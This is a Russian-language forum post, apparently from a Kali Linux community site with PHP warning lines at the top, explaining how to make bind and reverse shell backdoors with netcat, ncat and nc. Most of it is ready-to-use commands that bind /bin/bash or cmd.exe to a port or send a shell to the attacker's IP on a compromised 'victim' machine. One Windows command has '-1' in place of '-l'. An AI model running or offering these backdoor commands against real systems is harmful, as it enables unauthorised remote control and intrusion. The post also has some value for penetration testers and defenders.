Warning: Attempt to read property "comment_count" on null in /home/host1362995/kali.org.ru/htdocs/www/wp-includes/general-template.php on line 3194
Warning: Attempt to read property "ID" on null in /home/host1362995/kali.org.ru/htdocs/www/wp-includes/post-template.php on line 674

Warning: Attempt to read property "post_type" on null in /home/host1362995/kali.org.ru/htdocs/www/wp-includes/post-template.php on line 675

Warning: Attempt to read property "post_parent" on null in /home/host1362995/kali.org.ru/htdocs/www/wp-includes/post-template.php on line 728
class="-template-default page page-id- page-parent wp-embed-responsive global-layout-right-sidebar wpf-default wpft-post wpf-guest wpfu-group-4 wpf-theme-2022 wpf-is_standalone-1 wpf-boardid-0 is_wpforo_page-1 is_wpforo_url-1 is_wpforo_shortcode_page-0 wpforo">
Как сделать прямой ...
 
Уведомления
Очистить все

Как сделать прямой и обратный шелл (бэкдор) с Netcat

1 Записи
1 Пользователи
0 Likes
16.5 Тыс. Просмотры
 MiAl
(@mial)
Участник Admin
Присоединился: 6 лет назад
Записи: 267
Создатель темы  

Shell — так называют доступ к оболочке удалённой системы. Относительно информационной безопасности, так называют доступ к оболочке, который обеспечивается бэкдором.

Эти шеллы разделают на два вида:

  • Shell
  • Reverse Shell (обратный шелл)

Они различаются особенностями подключения. Первый (прямой) — просто Shell — когда бэкдор прослушивает порт на удалённом компьютере в ожидании, когда на этот порт придёт подключение.

Второй (обратный) — Reverse Shell означает, что с удалённого компьютера делается запрос на машину атакующего, на которой, в свою очередь, уже запущена программа для управления бэкдором — которая также ожидает подключения от компьютера «жертвы».

Оба они имеют разные случаи использования. Прямой шелл используется если у компьютера жертвы белый IP адрес (без использования NAT). Обратный шелл используется, если удалённый компьютер находится за NAT (имеет только локальный IP адрес), либо если файервол блокирует входящие соединения — большинство файерволов настроены пропускать исходящие соединения.

В качестве бэкдоров и программ для создания шэллов могут использоваться разные инструменты, здесь я покажу как создать шелл используя легитимную программу Netcat или Ncat, которые по умолчанию установлены на многих компьютерах Linux и серверах.

На Linux

На сервере, к которому получен доступ, программа netcat может называться по-разному, частые варианты:

  • netcat
  • nc
  • ncat

Ищите их любую из этих программ.

В последующих командах я покажу на примере ncat, если вы найдёте на удалённом компьютере netcat или nc, то в последующих командах замените исполнимый файл на них.

В Ncat

Для создания шелла на удалённом компьютере:

ncat -l -e "/bin/bash" [ПОРТ]

Для подключения к нему с локального компьютера:

ncat [IP] [ПОРТ]

Перед созданием обратного шелла, предварительно на локальном компьютере нужно выполнить:

ncat -l [ПОРТ]

Затем для создания обратного шелла с удалённого компьютера там нужно выполнить:

ncat -e "/bin/bash" [IP] [ПОРТ]

В GNU netcat, Netcat и nc

Для создания шелла на удалённом компьютере:

netcat -l -e "/bin/bash" -p [ПОРТ]

Для подключения к нему с локального компьютера:

netcat [IP] [ПОРТ]

Перед созданием обратного шелла, предварительно на локальном компьютере нужно выполнить:

netcat -l -p [ПОРТ]

Затем для создания обратного шелла с удалённого компьютера там нужно выполнить:

netcat -e "/bin/bash" [IP] [ПОРТ]

В Windows

Для создания прямого шелла:

nc -1 -p [ПОРТ] -e cmd.exe

Для создания обратного шелла (подключения до машины атакующего):

nc [IP атакующего] [ПОРТ] -e cmd.exe

Как и в случае с Linux, на машине атакующего уже должна быть запущена Ncat или другая программа для принятия входящего соединения.

Кстати, если вас заинтересовала утилита Netcat, то очень много про работу с этой программой в статье «Как пользоваться netcat (nc), ncat».


   
Цитата
Поделиться: